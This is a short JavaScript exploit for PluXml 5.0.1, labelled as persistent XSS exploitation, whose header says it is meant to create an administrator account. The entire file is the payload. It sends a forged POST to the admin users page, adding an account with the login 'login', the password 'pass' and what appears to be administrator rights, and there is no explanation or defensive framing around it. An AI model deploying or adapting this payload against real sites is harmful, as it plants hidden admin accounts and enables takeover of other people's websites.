/****************************************** * * Author: Zenk-Security * App: Pluxml 5.0.1 * Type: Persistent XSS expoitation * Function: Create Administrator account * *****************************************/ function createXMLHttpRequest() { try { return new ActiveXObject("Msxml2.XMLHTTP"); } catch(e) {} try { return new ActiveXObject("Microsoft.XMLHTTP"); } catch(e) {} try { return new XMLHttpRequest(); } catch(e) {} return null; } var ajax = createXMLHttpRequest(); if(ajax != null) { var params = 'userNum[]=999&999_newuser=true&999_name=user&999_infos=&999_login=login&999_password=pass&999_profil=0&999_active=1&selection=&update=Modifier+la+liste+des+utilisateurs'; ajax.open('POST', '/pluxml/core/admin/parametres_users.php', true); ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); ajax.setRequestHeader("Content-length", params.length); ajax.setRequestHeader("Connection", "close"); ajax.send(params); }